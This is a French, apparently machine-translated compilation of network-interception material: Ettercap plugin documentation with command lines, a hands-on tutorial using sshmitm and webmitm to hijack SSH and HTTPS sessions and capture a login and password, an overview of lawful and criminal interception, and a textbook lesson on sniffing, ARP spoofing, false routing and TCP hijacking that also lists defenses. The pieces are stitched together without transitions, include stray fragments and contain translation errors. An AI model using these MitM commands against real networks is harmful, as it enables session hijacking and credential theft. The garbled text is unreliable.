Ce plugin interrompt les requêtes DNS et répond avec une réponse usurpée (fausse). Vous pouvez choisir à quelle adresse le plugin doit répondre en éditant le fichier etter.dns. Le plugin intercepte les requêtes A, AAAA, PTR, MX, WINS, SRV et TXT. S'il s'agit d'une requête A, le nom est recherché dans le fichier et l'adresse IP est renvoyée (vous pouvez utiliser des caractères génériques dans le nom).

Il en va de même pour les demandes AAAA.

7.5 find_conn

Un plugin très simple qui écoute les requêtes ARP pour vous montrer toutes les cibles avec lesquelles l'hôte souhaite communiquer. Il peut également vous aider à trouver des adresses sur des réseaux locaux inconnus.

Ettercap -TQzP find_conn ettercap -TQu -i eth0 -P find_conn

7.6 find_ettercap

Essaie d'identifier les paquets ettercap envoyés au réseau local. Cela peut être utile pour identifier quelqu'un qui essaie d'utiliser ettercap. Ne vous y fiez pas à 100 % car les tests ne fonctionnent que sur des séquences/numéros d'identification spécifiques.

7.7 scan_poisoner

Je vérifierai si quelqu'un s'attaque à l'un des hôtes de la liste et à nous. Tout d'abord, il vérifie si deux hôtes de la liste ont le même Adresse Mac. Cela peut vouloir dire que l’un d’eux nous empoisonne en se faisant passer pour l’autre. Cela peut générer de nombreux faux positifs dans un environnement proxy-arp. Vous devez créer une liste d'hôtes pour effectuer cette vérification. Après cela, il envoie des paquets d'écho icmp à chaque hôte de la liste et vérifie si l'adresse MAC de la source de réponse est différente de l'adresse que nous avons stockée dans la liste avec cette IP. Cela pourrait signifier que quelqu'un appâte cet hôte en prétendant avoir notre adresse IP et en nous transmettant les paquets interceptés. Vous ne pouvez pas exécuter ce test actif en mode non offensif.

Ettercap -TQP scan_poisoner //

7.8 recherche_promisc

Il essaie de savoir si quelqu'un renifle (écoute) en mode promiscuité. Il envoie deux requêtes arp différentes mal formées à chaque cible de la liste d'hôtes et attend les réponses. Si la réponse provient de l'hôte cible, il est plus ou moins probable que la carte réseau de la cible soit en mode promiscuité. Cela peut générer de fausses alarmes. Vous pouvez l'exécuter soit depuis la ligne de commande, soit depuis le menu des plugins. Puisqu'il écoute les réponses arp, il vaudra mieux que vous ne les utilisiez pas lors de l'envoi de requêtes arp.

Ettercap -TQP search_promisc /192.168.0.1/ ettercap -TQP search_promisc //

Un exemple de tentative de deviner avec succès deux cartes réseau en mode promiscuité :

Développer

Root@HackWare:~# ettercap -TQP search_promisc ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team En écoute sur : eth0 -> 08:00:27:AF:30:B9 192.168.1.35/255.255.255.0 fe80::a00 : 27ff:feaf:30b9/64 La dissection SSL nécessite un script "redir_command_on" valide dans le fichier etter.conf Ettercap peut ne pas fonctionner correctement. /proc/sys/net/ipv6/conf/eth0/use_tempaddr n'est pas défini sur 0. Privilèges supprimés à EUID 65534 EGID 65534... 33 plugins 42 dissecteurs de protocole 57 ports surveillés 20388 empreinte digitale du fournisseur Mac 1766 empreinte digitale TCP OS 2182 services connus Lua : aucun script n'a été spécifié, ne démarre pas ! Randomisation de 255 hôtes pour l'analyse... Analyse de l'ensemble du masque de réseau pour 255 hôtes... * |================================ ============= ====================>| 100,00 % 5 hôtes ajoutés à la liste des hôtes... Démarrage du reniflage unifié... Texte uniquement Interface activée... Appuyez sur "h" pour l'aide en ligne Activation du plugin search_promisc... search_promisc : recherche des cartes réseau promises... Reniflage moins probable des cartes réseau : - 192.168.1.36 - 192.168.1.34 Très probablement reniflant les cartes réseau : - AUCUNE Fermeture de l'interface texte... Terminaison d'ettercap... Nettoyage de Lua terminé ! Le reniflage unifié a été arrêté.

7.9 sslstrip

Lors d'une attaque SSL mitm, ettercap remplace le vrai certificat SSL par le sien. Le faux certificat est créé à la volée et tous les champs sont remplis conformément au vrai certificat présenté par le serveur.

(62%)

(56.5%)

(ALÉATOIRE - 0,2%)

Dans cet article nous allons nous pencher sur les attaques comme Man-in-the-Middle, ou plutôt la méthode
rediriger le trafic SSH et HTTP à l’aide de l’attaque Man in the Middle. Ne tirons pas le chat par la queue, mais passons aux choses sérieuses.

L'homme du milieu (en bref MitM, du russe simplement - « attaque de l'intermédiaire » ou « homme
au milieu") est un type d'attaque basé sur la redirection du trafic entre deux machines pour intercepter des informations - les étudier plus en détail, les détruire ou les modifier. Ainsi, la première chose dont nous avons besoin est le package dsniff (vous verrez un lien vers le package à l'adresse (fin de l'article). Pourquoi Oui, car ce paquet contient tous les utilitaires nécessaires, y compris sshmitm (redirection du trafic SSH) et httpmitm (redirection du trafic HTTP), qui peuvent contourner le schéma de sécurité suivant : à votre connaissance, les protocoles avec le cryptage des données est tout à fait "sécurisé" (le cryptage aide :)) et ne permet pas de mener des attaques "au-dessus" de la couche réseau. La clé de cryptage est inconnue du pirate informatique - il est impossible de déchiffrer les données et insérez également une commande. Tout semble bien, mais voici comment procéder
puisque les programmes d'attaque MitM (sshmitm et httpmitm) du package dsniff sont capables de contourner ce système sécurité (vous pouvez contourner presque tout). Tout cela se fait selon le principe suivant :
l'hôte intermédiaire reçoit la requête du client, lui « indique » qu'il s'agit du serveur, puis se connecte au serveur réel.
La deuxième chose dont nous avons besoin, ce sont des bras tendus, la quatrième chose, la plus importante, c'est le désir et, bien sûr, une victime, c'est-à-dire l'ordinateur que nous allons attaquer.

Redirection du trafic SSH

Après avoir préparé les outils, vous avez compris ce qui était quoi et pourquoi :). Obtenez sshmitm - nous allons maintenant rediriger le trafic SSH (tout ce que vous n'avez pas compris avec la partie théorique - lisez ci-dessus)
en l'utilisant, profitant des lacunes de l'actuelle PKI (infrastructure à clé publique - un système de gestion de clés basé sur
méthodes de cryptographie asymétrique). Regardons la syntaxe
chut :

sshmitm [-d] [-I] [-p port] hôte

D
autoriser la sortie de débogage (c'est-à-dire un mode plus avancé)

je
détournement de session

Port P
port d'écoute

hôte
adresse de l'hôte distant dont les sessions seront interceptées

port
port sur l'hôte distant

Tout semble simple et de bon goût - il n'y a rien de compliqué :). Commençons à mettre en œuvre l'attaque !

# sshmitm server.target.gov // spécifiez votre serveur SSH
sshmitm : relais vers le serveur server.target.gov

Comme nous n'avons pas de véritable clé SSH, l'interpréteur de commandes de l'attaquant
affichera une demande de vérification de la clé de l'hôte, tout ressemblera à ceci :

clientmachine$ serveur.target.gov
@AVERTISSEMENT : L'IDENTIFICATION DE L'HÔTE À DISTANCE A CHANGÉ ! @
IL EST POSSIBLE QUE QUELQU'UN FAIT QUELQUE CHOSE DE MAL !
Quelqu’un pourrait vous écouter en ce moment (attaque de l’homme du milieu) !
Il est également possible que la clé de l'hôte RSA vienne d'être modifiée.
Veuillez contacter votre administrateur système.

Et puis l'utilisateur décidera de se connecter ou non. Si oui, nous aurons alors un contrôle total sur la session SSH.
MAIS! Si l'utilisateur ne s'est jamais connecté à cette voiture, le message suivant peut s'afficher :

L'authenticité de l'hôte "server.target.gov" ne peut pas être établie
L'empreinte digitale de la clé RSA est
bla:bla:bla;bla;bla........
Êtes-vous sûr de vouloir continuer à vous connecter (oui/non) ?

Ici, l'utilisateur a également deux choix : se connecter ou non. Si oui, alors nous avons intercepté la session, sinon, alors hélas... :(.
En général, l'attaque réussissait si l'utilisateur se connectait, et sshmitm, à son tour, enregistrait tous les passages et connexions, et de manière très lisible :)
Naturellement, ce n'est pas le seul intercepteur de session SSH, mais une fois que vous vous y serez familiarisé, vous pourrez facilement en maîtriser un autre :)

Redirection du trafic HTTP

Nous allons maintenant rediriger le trafic HTTP. Là encore, nous aurons besoin d'un outil préalablement sélectionné : httpmitm, qui écoute les ports 80 (HTTP -) et 443 (HTTPS -), intercepte les requêtes WEB, puis se connecte au serveur et transmet les requêtes à l'ordinateur client. Le programme génère également des clés SSL et des certificats SSL à l'aide d'OpenSSL. Puis, après avoir essayé
se connecte au site (target.gov), le navigateur vérifiera le certificat SSL. Étant donné que les certificats ne correspondent pas, le navigateur de l'utilisateur avertira de
certificat SSL incorrect. Du point de vue de l'attaquant, cela ressemblera à ceci :

#webmitm -d
webmitm : relayer en toute transparence
webmitm : nouvelle connexion depuis
OBTENIR [lien]/uzerz.php?user=hellknights&password=neskaju1qwerty HTTP/[version]
Type de connexion]
Hébergeur : www.target.gov
Agent utilisateur : [système, informations du navigateur]
[etc, etc, etc]
Cookie : [cookies]

Voilà à quoi tout ressemble vu de l'extérieur -
la connexion SSL est interceptée, capturant les données non cryptées.

Conclusion

Dans cet article, nous avons examiné la redirection du trafic SSH et HTTP à l'aide de l'attaque Man in the Middle - clairement, en détail et brièvement. Autres redirecteurs HTTP et SSH
Vous maîtriserez rapidement le trafic en utilisant MitM si vous les maîtrisez également :)). Si quelque chose n'était pas clair, alors...

L'interception de données sur un réseau correspond à la réception de toute information provenant d'un appareil informatique distant. Il peut s’agir des informations personnelles de l’utilisateur, de ses messages et des enregistrements de visites du site Internet. La capture des données peut être effectuée par un logiciel espion ou à l'aide de renifleurs de réseau.

Un logiciel espion est un logiciel spécial capable d'enregistrer toutes les informations transmises sur un réseau à partir d'un poste de travail ou d'un appareil spécifique.

Un renifleur est un programme ou une technologie informatique qui intercepte et analyse le trafic transitant par un réseau. Le renifleur vous permet de vous connecter à une session Web et d'effectuer diverses opérations au nom du propriétaire de l'ordinateur.

Si les informations ne sont pas transmises en temps réel, Spyware générer des rapports qui facilitent la visualisation et l'analyse des informations.

L'interception du réseau peut être effectuée légalement ou illégalement. Le principal document fixant la légalité de l'obtention d'informations est la Convention sur la cybercriminalité. Elle a été créée en Hongrie en 2001. Les exigences légales peuvent varier légèrement d’un État à l’autre, mais le message clé est le même pour tous les pays.

Classification et méthodes d'interception des données sur le réseau

Conformément à ce qui précède, l'interception d'informations sur un réseau peut être divisée en deux types : autorisée et non autorisée.

La capture de données autorisée est effectuée à diverses fins, allant de la protection des informations de l'entreprise à la garantie de la sécurité nationale. Les motifs pour effectuer une telle opération sont déterminés par la législation, les services spéciaux, les forces de l'ordre et les spécialistes. organisations administratives et les services de sécurité de l'entreprise.

Il existe des normes internationales pour effectuer l’interception de données. L'Institut européen des normes de télécommunications a réussi à harmoniser un certain nombre de processus techniques (ETSI ES 201 158 « Sécurité des télécommunications ; Interception légale (LI) ; Exigences pour les fonctions de réseau ») sur lesquels repose l'interception d'informations. En conséquence, une architecture système a été développée pour aider les spécialistes des services secrets et les administrateurs réseau à obtenir légalement des données du réseau. La structure développée pour la mise en œuvre de l'interception de données sur le réseau est utilisée pour les communications filaires et systèmes sans fil appels vocaux, ainsi que correspondance par courrier, transmission de messages vocaux sur IP, échange d'informations par SMS.

L'interception non autorisée de données sur un réseau est réalisée par des attaquants qui souhaitent s'emparer de données confidentielles, de mots de passe, de secrets d'entreprise, d'adresses de machines informatiques sur le réseau, etc. Pour atteindre leurs objectifs, les pirates utilisent généralement un analyseur de trafic réseau - un renifleur. Ce programme ou un dispositif matériel-logiciel donne au fraudeur la possibilité d'intercepter et d'analyser les informations au sein du réseau auquel l'utilisateur victime est connecté, y compris le trafic SSL crypté via l'usurpation de certificat. Les données de trafic peuvent être obtenues de différentes manières :

écouter l'interface réseau,
connecter un dispositif d'interception à une coupure de canal,
créer une branche de trafic et la dupliquer vers le sniffer,
en menant une attaque.

Il existe également des technologies plus complexes pour intercepter des informations importantes qui permettent de s'immiscer dans les interactions réseau et de modifier les données. L’une de ces techniques consiste à falsifier les requêtes ARP. L’essence de la méthode consiste à remplacer les adresses IP entre l’ordinateur de la victime et l’appareil de l’attaquant. Une autre méthode pouvant être utilisée pour intercepter des données sur un réseau est le faux routage. Il s'agit de remplacer l'adresse IP d'un routeur réseau par votre propre adresse. Si un cybercriminel sait comment est organisé le réseau local dans lequel se trouve la victime, alors il peut facilement organiser la réception des informations de la machine de l'utilisateur vers son adresse IP. Capturer une connexion TCP sert également de manière efficace interception de données. L'attaquant interrompt la session de communication en générant et en envoyant des paquets TCP à l'ordinateur de la victime. Ensuite, la session de communication est rétablie, interceptée et poursuivie par le criminel au lieu du client.

Objet d'influence

Les objets d'interception de données sur le réseau peuvent être des agences gouvernementales, des entreprises industrielles, des structures commerciales et des utilisateurs ordinaires. Au sein d'une organisation ou d'une entreprise, des informations peuvent être capturées afin de protéger l'infrastructure réseau. Les agences de renseignement et les forces de l'ordre peuvent procéder à des interceptions massives d'informations transmises par différents propriétaires, en fonction de la tâche à accomplir.

Si nous parlons de cybercriminels, alors tout utilisateur ou organisation peut devenir un objet d'influence afin d'obtenir des données transmises sur le réseau. Avec un accès autorisé, la partie informative des informations reçues est importante, tandis qu'un attaquant s'intéresse davantage aux données qui peuvent être utilisées pour s'emparer en liquide ou des informations précieuses pour sa vente ultérieure.

Le plus souvent, les utilisateurs qui se connectent à un réseau public, par exemple dans un café doté d'un hotspot, sont victimes d'interception d'informations par des cybercriminels. Accès Wi-Fi. Un attaquant se connecte à une session Web à l'aide d'un renifleur, remplace les données et vole des informations personnelles. En savoir plus sur la façon dont cela se produit dans l'article.

Source de menace

L'interception autorisée d'informations dans les entreprises et les organisations est réalisée par les opérateurs d'infrastructures de réseaux publics. Leurs activités visent à protéger les données personnelles, les secrets commerciaux et autres une information important. Légalement, le transfert de messages et de fichiers peut être surveillé par les services de renseignement, les forces de l'ordre et diverses agences gouvernementales afin d'assurer la sécurité des citoyens et de l'État.

Les criminels se livrent à l’interception illégale de données. Pour éviter d’être victime d’un cybercriminel, vous devez suivre quelques recommandations d’experts. Par exemple, vous ne devez pas effectuer d'opérations nécessitant une autorisation et un transfert de données sensibles dans des endroits où la connexion se fait aux réseaux publics. Il est plus sûr de choisir des réseaux cryptés et, mieux encore, d'utiliser des modems personnels 3G et LTE. Lors du transfert de données personnelles, il est recommandé de les crypter à l'aide du protocole HTTPS ou d'un tunnel VPN personnel.

Vous pouvez protéger votre ordinateur contre l'interception du trafic réseau à l'aide de la cryptographie et des anti-renifleurs ; L'accès au réseau par ligne commutée plutôt que sans fil réduira les risques.

Cette leçon décrit les technologies de piratage de réseau basées sur l'interception de paquets réseau. Les pirates informatiques utilisent ces technologies pour écouter le trafic réseau afin de voler des informations précieuses, pour organiser l'interception de données dans le but d'une attaque de l'homme du milieu, pour intercepter les connexions TCP, permettant, par exemple, l'usurpation de données et pour effectuer d'autres , des actions non moins intéressantes. Malheureusement, la plupart de ces attaques ne sont en réalité mises en œuvre que pour les réseaux Unix, pour lesquels les pirates peuvent utiliser à la fois utilitaires spéciaux et les outils système Unix. Les réseaux Windows ont apparemment été ignorés par les pirates informatiques et nous sommes obligés de limiter notre description des outils d'interception de données aux programmes de renifleur conçus pour une écoute triviale des paquets réseau. Cependant, il ne faut pas négliger une description au moins théorique de telles attaques, notamment pour les anti-hackers, car la connaissance des technologies de piratage utilisées permettra d'éviter de nombreux problèmes.

Reniflage de réseau

Généralement utilisé pour détecter les réseaux Ethernet. cartes réseau passé en mode écoute. Écoute Réseaux Ethernet nécessite de connecter un ordinateur exécutant un programme de renifleur à un segment de réseau, après quoi tout le trafic réseau envoyé et reçu par les ordinateurs de ce segment de réseau devient disponible pour le pirate informatique. Il est encore plus facile d'intercepter le trafic des réseaux radio utilisant des intermédiaires de réseau sans fil - dans ce cas, vous n'avez même pas besoin de chercher un endroit pour vous connecter au câble. Ou un attaquant peut se connecter à la ligne téléphonique reliant l'ordinateur au serveur Internet, trouvant un endroit pratique pour cela (les lignes téléphoniques sont généralement posées dans les sous-sols et autres endroits rarement visités sans aucune protection).

Pour démontrer la technologie de détection, nous utiliserons le très populaire programme de détection SpyNet, que l'on peut trouver sur de nombreux sites Web. Le site officiel du programme SpyNet se trouve à l'adresse http://members.xoom.com/layrentiu2/, où vous pouvez télécharger une version démo du programme.

Le programme SpyNet se compose de deux composants : CaptureNet et PipeNet. Le programme CaptureNet vous permet d'intercepter les paquets transmis sur un réseau Ethernet au niveau du réseau, c'est-à-dire sous forme de trames Ethernet. Le logiciel PipeNet vous permet d'assembler des trames Ethernet en paquets de couche application, en restaurant, par exemple, des messages E-mail, messages du protocole HTTP (échange d'informations avec le serveur Web) et remplit d'autres fonctions.

Malheureusement, dans la démo de SpyNet, les capacités de PipeNet sont limitées à la démo d'assemblage de paquets HTTP, nous ne pourrons donc pas démontrer SpyNet dans son intégralité. Cependant, nous démontrerons les capacités de détection de réseau de SpyNet en utilisant notre réseau expérimental comme exemple en passant fichier texte de l'hôte Sword-2000 à l'hôte Alex-Z en utilisant l'habituel Windows Explorer. En même temps, sur l'ordinateur A1ex-1 nous lancerons le programme CaptureNet, qui interceptera les paquets transmis et nous permettra de lire le contenu du fichier transmis dans les trames Ethernet. En figue. 1 montre le texte du message secret dans le fichier secret.txt ; nous allons essayer de retrouver ce texte dans les trames Ethernet capturées.

Riz. 1. Texte du message secret dans la fenêtre Bloc-notes

Pour capturer des trames Ethernet, procédez comme suit :

Sur l'ordinateur Alex-Z, exécutez le programme CaptureNet. Dans la fenêtre de travail affichée du programme, sélectionnez la commande de menu Capture * Start (Capture * Start) et démarrez le processus d'interception des trames réseau.

À l'aide de l'Explorateur Windows, copiez le fichier security.txt de l'ordinateur Sword-2000 vers A1ex-3.

Après avoir transféré le fichier secret.txt, sélectionnez la commande de menu Capture * Stop et arrêtez le processus de capture.

Les trames Ethernet capturées apparaîtront sur le côté droit de la fenêtre du programme CaptureNet (Figure 2), chaque ligne de la liste supérieure représentant une trame Ethernet et en dessous de la liste le contenu de la trame sélectionnée.

Riz. 2. La trame Ethernet contient le texte du message secret

Après avoir parcouru la liste des trames interceptées, nous pouvons facilement trouver celle qui contient le texte que nous avons transmis Ceci est un très grand secret (This is a very big secret).

Nous soulignons qu'il s'agit de l'exemple le plus simple, où tout le trafic réseau intercepté a été enregistré. CaptureNet vous permet d'intercepter les paquets envoyés via des protocoles spécifiques et vers des ports hôtes spécifiques, de sélectionner des messages avec un contenu spécifique et d'accumuler les données capturées dans un fichier. La technique pour effectuer de telles actions est simple et peut être apprise à l'aide du système d'aide du programme SpyNet.

En plus des écoutes réseau primitives, les pirates ont accès à des moyens d'interception de données plus sophistiqués. Vous trouverez ci-dessous un bref aperçu de ces méthodes, bien que sous un aspect théorique. La raison en est que pour les réseaux Windows, la mise en œuvre pratique des attaques par interception de données est extrêmement limitée et l'ensemble des utilitaires fiables pour les attaques par interception est assez pauvre.

Méthodes d'interception du trafic réseau

Le reniflage de réseau à l'aide de programmes d'analyse de réseau comme CaptureNet ci-dessus est le premier et le plus simple moyen d'intercepter des données. En plus de SpyNet, de nombreux outils sont utilisés pour détecter le réseau, initialement développés dans le but d'analyser l'activité du réseau, de diagnostiquer les réseaux, de sélectionner le trafic selon des critères spécifiés et d'autres tâches d'administration réseau. Un exemple d'un tel programme est tcpdump (http://www.tcpdump.org), qui vous permet d'enregistrer le trafic réseau dans un journal spécial pour une analyse ultérieure.

Pour se protéger contre les écoutes réseau, des programmes spéciaux sont utilisés, par exemple AntiSniff (http://www.securitysoftwaretech.com/antisniff), capables d'identifier les ordinateurs du réseau qui écoutent le trafic réseau. Pour résoudre leurs problèmes, les programmes anti-renifleurs utilisent un signe spécial de présence de périphériques d'écoute sur le réseau - la carte réseau de l'ordinateur renifleur doit être dans un mode d'écoute spécial. En mode écoute, les ordinateurs du réseau réagissent de manière particulière aux datagrammes IP envoyés à l'hôte testé. Par exemple, les hôtes en écoute traitent généralement tout le trafic entrant, et pas seulement les datagrammes envoyés à l'adresse de l'hôte. Il existe d'autres signes indiquant un comportement suspect de l'hôte qu'AntiSniff peut reconnaître.

Fausses requêtes ARP

Pour intercepter et reprendre le processus d'interaction réseau entre deux hôtes A et B, un attaquant peut remplacer les adresses IP des hôtes en interaction par sa propre adresse IP en envoyant des messages ARP (Address Resolution Protocol) falsifiés aux hôtes A et B. Vous pouvez vous familiariser avec le protocole ARP dans l'annexe D, qui décrit la procédure de résolution (conversion) de l'adresse IP de l'hôte en adresse de machine (adresse MAC) codée en dur dans la carte réseau de l'hôte. Voyons comment un pirate informatique peut utiliser ARP pour intercepter les communications réseau entre les hôtes A et B.

L'attaquant détermine les adresses MAC des hôtes A et B, par exemple à l'aide de la commande nbtstat du package W2RK.

L'attaquant envoie des messages aux adresses MAC identifiées des hôtes A et B, qui sont des réponses ARP falsifiées aux demandes de résolution des adresses IP des hôtes en adresses MAC des ordinateurs. L'hôte A est informé que l'adresse IP de l'hôte B correspond à l'adresse MAC de l'ordinateur de l'attaquant ; l’hôte B est informé que l’adresse IP de l’hôte A correspond également à l’adresse MAC de l’ordinateur de l’attaquant.

Les hôtes A et B stockent les adresses MAC reçues dans leurs caches ARP, puis les utilisent pour s'envoyer des messages. Puisque les adresses IP A et B correspondent à l’adresse MAC de l’ordinateur de l’attaquant, les hôtes A et B communiquent sans s’en douter via un intermédiaire qui peut tout faire avec leurs messages.

Pour se protéger contre de telles attaques, les administrateurs réseau doivent maintenir une base de données avec une table de correspondance entre les adresses MAC et les adresses IP de leurs ordinateurs réseau. Ensuite, en utilisant un spécial logiciel Par exemple, les utilitaires arpwatch (ftp://ftp.ee.lbl.gov/arpwatch-2.lab.tar.gz) peuvent inspecter périodiquement le réseau et identifier les incohérences.

Sur les réseaux UNIX, ce type d'attaque par requête ARP usurpée peut être mis en œuvre à l'aide d'utilitaires système de surveillance et de gestion du trafic réseau, tels que arpredirect. Malheureusement, ces utilitaires fiables ne semblent pas être implémentés sur les réseaux Windows 2000/XP. Par exemple, sur le site NTsecurity (http://www.ntsecurity.nu), vous pouvez télécharger l'utilitaire GrabitAII, présenté comme un outil de redirection du trafic entre les hôtes du réseau. Cependant, une vérification de base des fonctionnalités de l'utilitaire GrabitAII montre que le succès complet dans la mise en œuvre de ses fonctions est encore loin.

Faux routage

Pour effectuer un faux routage, l'attaquant doit connaître certains détails sur l'organisation du réseau local dans lequel se trouve l'hôte A, notamment l'adresse IP du routeur par lequel le trafic est envoyé de l'hôte A vers B. Sachant cela, l'attaquant générera un datagramme IP dans lequel IP - l'adresse de l'expéditeur est définie comme l'adresse IP du routeur et le destinataire est l'hôte A. Le datagramme contient également un message de redirection ICMP avec le champ d'adresse du nouveau routeur défini sur le Adresse IP de l'ordinateur de l'attaquant. Après avoir reçu un tel message, l'hôte A enverra tous les messages à l'adresse IP de l'ordinateur de l'attaquant.

Les exemples d'interceptions ci-dessus (auxquels les capacités des attaquants sont loin d'être limitées) nous convainquent de la nécessité de protéger les données transmises sur le réseau si les données contiennent des informations confidentielles. La seule méthode de protection contre les interceptions du trafic réseau consiste à utiliser des programmes qui mettent en œuvre des algorithmes cryptographiques et des protocoles de cryptage et empêchent la divulgation et la substitution d'informations secrètes. Pour résoudre ces problèmes, la cryptographie fournit des outils permettant de chiffrer, de signer et de vérifier l'authenticité des messages transmis via des protocoles sécurisés.

La mise en œuvre pratique de toutes les méthodes cryptographiques de protection des échanges d'informations décrites au chapitre 4 est assurée par les réseaux VPN (Virtual Private Network). Un bref aperçu des principes et techniques de sécurité cryptographique est disponible à l'annexe E. Description détaillée outils de protection cryptographique fournis par l'application PGP Desktop Security (http://www.pgp.com).

Interception de connexion TCP

Plusieurs utilitaires efficaces ont été créés pour effectuer des attaques de détournement de connexion TCP, mais tous sont implémentés pour la plate-forme Unix, et sur les sites Web, ces utilitaires sont présentés uniquement sous forme de code source. Ainsi, en praticiens convaincus de la noble cause du piratage, les attaques utilisant la méthode d’interception de connexion TCP ne nous sont pas d’une grande utilité. (Ceux qui aiment comprendre le code des programmes des autres peuvent se référer au site http://www.cri.cz/~kra/index.html, où vous pouvez télécharger source le célèbre utilitaire d'interception de connexion TCP Hunt de Pavel Krauz).

Malgré le manque d'outils pratiques, nous ne pouvons ignorer un sujet aussi intéressant que l'interception des connexions TCP, et nous nous attarderons sur certains aspects de ces attaques. Certaines informations sur la structure d'un paquet TCP et la procédure d'établissement de connexions TCP sont données dans l'annexe D de ce livre, mais ici nous nous concentrerons sur la question : qu'est-ce qui permet exactement aux pirates de mener des attaques d'interception de connexion TCP ? Examinons ce sujet plus en détail, en nous appuyant principalement sur la discussion dans et.

Le protocole TCP (Transmission Control Protocol) est l'un des protocoles de base de couche de transport OSI qui vous permet d'établir des connexions logiques sur un canal de communication virtuel. Sur ce canal, les paquets sont transmis et reçus avec leur séquence enregistrée, le flux des paquets est contrôlé, la retransmission des paquets déformés est organisée et en fin de session le canal de communication est rompu. Le protocole TCP est le seul protocole principal de la famille TCP/IP doté d'un système avancé d'identification et de connexion des messages.

Pour identifier un paquet TCP, il y a deux identifiants de 32 bits dans l'en-tête TCP, qui font également office de compteurs de paquets, appelés numéro de séquence et numéro d'accusé de réception. Nous nous intéresserons également à un autre champ du paquet TCP, appelé bits de contrôle. Ce champ de 6 bits comprend les bits de contrôle suivants (dans l'ordre de gauche à droite) :

URG - drapeau d'urgence ;

ACK - indicateur de confirmation ;

PSH - porter le drapeau ;

RST - indicateur de rétablissement de connexion ;

SYN - indicateur de synchronisation ;

FIN - indicateur de fin de connexion.

Regardons la procédure de création d'une connexion TCP.

1. Si l'hôte A doit créer une connexion TCP avec l'hôte B, alors l'hôte A envoie à l'hôte B le message suivant :

A -> B : SYN, ISSa

Cela signifie que le message envoyé par l'hôte A a l'indicateur SYN (numéro de séquence de synchronisation) défini et que le champ du numéro de séquence est défini sur la valeur initiale de 32 bits ISSa (numéro de séquence initial).

2. En réponse à la demande reçue de l'hôte A, l'hôte B répond par un message dans lequel le bit SYN est défini et le bit ACK est défini. Dans le champ du numéro de séquence, l'hôte B définit sa valeur de compteur initiale - ISSb ; le champ du numéro d'accusé de réception contiendra alors la valeur ISSa reçue dans le premier paquet de l'hôte A, augmentée de un. L'hôte B répond donc avec ce message :

B -> A : SYN, ACK, ISSb, ACK(ISSa+1)

3. Enfin, l'hôte A envoie un message à l'hôte B, dans lequel : le bit ACK est défini ; le champ numéro de séquence contient la valeur ISSa + 1 ; Le champ numéro d'accusé de réception contient la valeur ISSb + 1. Après cela, la connexion TCP entre les hôtes A et B est considérée comme établie :

A -> B : ACK, ISSa+1, ACK(ISSb+1)

4. L'hôte A peut désormais envoyer des paquets de données à l'hôte B via le canal TCP virtuel nouvellement créé :

A -> B : ACK, ISSa+1, ACK(ISSb+1); DONNÉES

Ici, DATA signifie données.

À partir de l'algorithme de création d'une connexion TCP discuté ci-dessus, il peut être vu que les seuls identifiants des abonnés TCP et d'une connexion TCP sont deux paramètres de 32 bits du numéro de séquence et du numéro d'accusé de réception - ISSa et ISSb. Par conséquent, si un pirate informatique parvient à connaître les valeurs actuelles des champs ISSa et ISSb, alors rien ne l'empêchera de générer un paquet TCP falsifié. Cela signifie qu'un pirate informatique n'a besoin que de sélectionner les valeurs actuelles des paramètres ISSa et ISSb d'un paquet TCP pour une connexion TCP donnée, d'envoyer le paquet depuis n'importe quel hôte Internet au nom du client de cette connexion TCP, et ce paquet sera perçu comme correct !

Le danger d'une telle usurpation de paquets TCP est également important car les protocoles FTP et TELNET de haut niveau sont implémentés sur la base du protocole TCP, et l'identification des clients de paquets FTP et TELNET est entièrement basée sur le protocole TCP.

De plus, comme les protocoles FTP et TELNET ne vérifient pas les adresses IP des expéditeurs de messages, après avoir reçu un paquet falsifié, les serveurs FTP ou TELNET enverront un message de réponse à l'adresse IP de l'hôte pirate spécifiée dans le faux paquet. Après cela, l'hôte pirate commencera à travailler avec le serveur FTP ou TELNET à partir de son adresse IP, mais avec les droits d'un utilisateur légalement connecté, qui, à son tour, perdra le contact avec le serveur en raison d'une inadéquation des compteurs.

Ainsi, pour mener à bien l'attaque décrite ci-dessus, une condition nécessaire et suffisante est la connaissance des deux paramètres actuels de 32 bits ISSa et ISSb qui identifient la connexion TCP. Considérons moyens possibles les recevoir. Dans le cas où l'hôte du pirate informatique est connecté au segment de réseau attaqué, la tâche d'obtention des valeurs ISSa et ISSb est triviale et peut être résolue en analysant le trafic réseau. Il faut donc bien comprendre que le protocole TCP permet, en principe, de protéger une connexion uniquement s'il est impossible pour un attaquant d'intercepter les messages transmis via cette connexion, c'est-à-dire uniquement dans le cas où l'hôte du pirate informatique est connecté à un segment de réseau différent du segment d'abonné de la connexion TCP.

Par conséquent, les attaques intersegments présentent le plus grand intérêt pour un pirate informatique, lorsque l'attaquant et sa cible se trouvent dans des segments de réseau différents. Dans ce cas, la tâche d'obtention des valeurs d'ISSa et d'ISSb n'est pas anodine. Pour résoudre ce problème, seules deux méthodes ont désormais été inventées.

Prédiction mathématique de la valeur initiale des paramètres de connexion TCP par extrapolation des valeurs précédentes de ISSa et ISSb.

Exploitation des vulnérabilités dans l'identification des abonnés à la connexion TCP sur les serveurs rsh Unix.

La première tâche est résolue grâce à des études approfondies sur la mise en œuvre du protocole TCP dans divers systèmes d'exploitation et a désormais une signification purement théorique. Le deuxième problème est résolu à l'aide de vulnérabilités Systèmes Unix en identifiant les hôtes de confiance. (Le système de confiance par rapport à un hôte A donné est un hôte réseau B dont l'utilisateur peut se connecter à l'hôte A sans authentification à l'aide du service r de l'hôte A). En manipulant les paramètres des paquets TCP, un pirate informatique peut tenter de se faire passer pour un hôte de confiance et intercepter une connexion TCP avec l'hôte attaqué.

Tout cela est très intéressant, mais les résultats pratiques de ce type de recherche ne sont pas encore visibles. Par conséquent, nous conseillons à tous ceux qui souhaitent approfondir ce sujet de se tourner vers le livre, d'où proviennent principalement les informations présentées ci-dessus.

Conclusion

L’interception des données réseau est la méthode de piratage réseau la plus efficace, permettant à un pirate informatique d’obtenir la quasi-totalité des informations circulant sur le réseau. Le plus grand développement pratique a été réalisé par les outils de détection, c'est-à-dire écouter les réseaux; Cependant, nous ne pouvons ignorer les méthodes d'interception des données du réseau, réalisées en interférant avec le fonctionnement normal du réseau afin de rediriger le trafic vers un hôte pirate, notamment les méthodes d'interception des connexions TCP. Cependant, dans la pratique, ces dernières méthodes n’ont pas encore été suffisamment développées et doivent être améliorées.

